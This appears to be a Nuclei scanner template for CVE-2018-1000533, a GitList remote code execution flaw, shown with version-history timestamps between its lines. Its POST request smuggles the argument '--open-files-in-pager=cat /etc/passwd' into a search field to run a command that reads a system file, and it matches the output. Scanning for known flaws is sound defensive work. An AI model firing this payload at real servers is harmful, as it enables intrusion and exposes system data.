2021-06-15 07:28:10 +00:00
id : CVE-2018-1000533
info :
name : GitList < 0.6.0 RCE
author : pikpikcu
severity : critical
2021-06-15 10:01:36 +00:00
description : klaussilveira GitList version <= 0.6 contains a Passing incorrectly sanitized input to system function vulnerability in `searchTree` function that can result in Execute any code as PHP user.
2021-06-15 07:28:10 +00:00
reference : https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
2021-06-15 10:01:36 +00:00
tags : rce,git,cve,cve2018,gitlist
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2018-1000533
cwe-id : CWE-20
2021-06-15 07:28:10 +00:00
requests :
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
- |
POST /{{path}}/tree/a/search HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
query=--open-files-in-pager=cat%20/etc/passwd
extractors :
- type : regex
name : path
group : 1
internal : true
part : body
regex :
- '<span class="name">(.*?)</span>'
matchers :
2021-06-15 10:53:59 +00:00
- type : word
words :
2021-06-15 07:28:10 +00:00
- "root:/root:/bin/bash"
2021-06-15 11:08:28 +00:00
part : body